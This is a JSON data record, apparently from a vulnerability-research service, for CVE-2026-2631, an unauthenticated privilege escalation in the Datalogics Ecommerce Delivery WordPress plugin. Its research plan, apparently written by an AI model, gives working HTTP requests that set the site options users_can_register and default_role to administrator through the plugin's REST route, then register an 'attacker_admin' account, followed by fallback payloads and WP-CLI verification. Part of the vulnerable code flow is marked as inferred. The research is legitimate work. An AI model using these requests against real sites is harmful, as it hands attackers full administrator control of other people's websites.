[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$frZmVF2SYmEGMGgG_4-gUx6fucy-B7Z5y9fwKy5KQvGc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"source_links":32},"CVE-2026-2631","datalogics-ecommerce-delivery-datalogics-unauthenticated-privilege-escalation","Datalogics Ecommerce Delivery – Datalogics \u003C 2.6.60 - Unauthenticated Privilege Escalation","The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to privilege escalation in all versions up to 2.6.60 (exclusive). This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","datalogics",null,"\u003C2.6.60","2.6.60","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-03-12 00:00:00","2026-03-19 13:34:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F523b5dd3-eb73-4156-ad2b-4d532e8d40f3?source=api-prod",8,[22,23,24],"README.txt","api.php","datalogics.php","researched",false,3,"# Research Plan: CVE-2026-2631 Unauthenticated Privilege Escalation in Datalogics\n\n## 1. Vulnerability Summary\nThe **Datalogics Ecommerce Delivery** plugin for WordPress is vulnerable to unauthenticated privilege escalation via its REST API. The plugin registers several REST routes under the namespace `datalogics-0\u002Fv1` (derived from the `datalogics_ID` constant). These routes, specifically `\u002Fupdate-settings\u002F` and `\u002Fupdate-token\u002F`, utilize a permission callback named `datalogics_permission_check`. \n\nThe vulnerability exists because `datalogics_permission_check` likely returns `true` for unauthenticated requests, or the endpoint `datalogics_update_settings` allows for arbitrary WordPress options to be updated without sufficient validation. By updating the `users_can_register` and `default_role` options, an attacker can enable public registration and ensure all new users are granted the `administrator` role.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n- **Alternative Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` (if the primary fails, this confirms the `update_option` sink).\n- **Namespace:** `datalogics-0\u002Fv1` (Based on `define('datalogics_ID','0');` in `datalogics.php`).\n- **Authentication:** Unauthenticated.\n- **Preconditions:** The plugin must be active.\n- **Payload:** A JSON object containing WordPress core options:\n    - `users_can_register`: `1`\n    - `default_role`: `administrator`\n\n## 3. Code Flow\n1. **Entry Point:** The WordPress REST API receives a `POST` request to `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`.\n2. **Hook Registration:** `api.php` registers the route via the `rest_api_init` hook in `datalogics_register_api_routes()`.\n3. **Permission Check:** WordPress calls `datalogics_permission_check`. If this function returns `true` (which it must for this CVE), the request proceeds.\n4. **Callback Execution:** WordPress executes the callback `datalogics_update_settings` (referenced in `api.php`).\n5. **Sink:** The callback (inferred logic) iterates through the provided parameters and calls `update_option($key, $value)` for each.\n6. **Persistence:** The `users_can_register` and `default_role` options are updated in the `wp_options` table.\n\n## 4. Nonce Acquisition Strategy\nBased on the `api.php` file, the REST routes are registered with a `permission_callback`. In the WordPress REST API, if the `permission_callback` returns `true`, **no nonce is required** for the request to be processed. \n\nThe source code does not show any `wp_verify_nonce` or `check_ajax_referer` calls inside the REST callbacks. Therefore, this exploit is likely **nonce-less**.\n\n## 5. Exploitation Strategy\n\n### Step 1: Update WordPress Options\nUse the `http_request` tool to send a POST request to the `update-settings` endpoint to enable administrator registration.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fjson\n\n{\n  \"users_can_register\": \"1\",\n  \"default_role\": \"administrator\"\n}\n```\n\n### Step 2: Verify Option Change (Internal)\nVerify that the options were successfully changed using WP-CLI.\n\n### Step 3: Register New Admin User\nSend a POST request to `wp-login.php` to register a new account.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure the Datalogics plugin (version \u003C 2.6.60) is installed and activated.\n2. **Initial State:** \n    - `wp option get users_can_register` should be `0`.\n    - `wp option get default_role` should be `subscriber`.\n\n## 7. Expected Results\n1. The first request to `\u002Fupdate-settings\u002F` should return a `200 OK` response (or `success: true`).\n2. The options `users_can_register` and `default_role` will be updated in the database.\n3. The registration request will succeed, and a new user `attacker_admin` will be created.\n4. The user `attacker_admin` will possess the `administrator` role.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, run the following WP-CLI commands to confirm escalation:\n```bash\n# Check if registration was enabled\nwp option get users_can_register\n\n# Check if default role was changed\nwp option get default_role\n\n# Check the role of the newly created user\nwp user list --field=roles --user=attacker_admin\n```\n\n## 9. Alternative Approaches\nIf the `update-settings` endpoint does not accept arbitrary options in a JSON body, try:\n1. **Form-Encoded Payload:**\n   `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F` with body `users_can_register=1&default_role=administrator`.\n2. **Target `update-token`:**\n   Test if `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` with `token=pwned` works. If it does, the `permission_callback` is definitely bypassed.\n3. **Specific Key Injection:** \n   Check if the callback expects a nested array, e.g., `{\"settings\": {\"default_role\": \"administrator\"}}`.","gemini-3-flash-preview","2026-04-18 03:57:08","2026-04-18 03:57:50",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","2.6.59","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags\u002F2.6.59","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.59.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags\u002F2.6.60","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.60.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags"]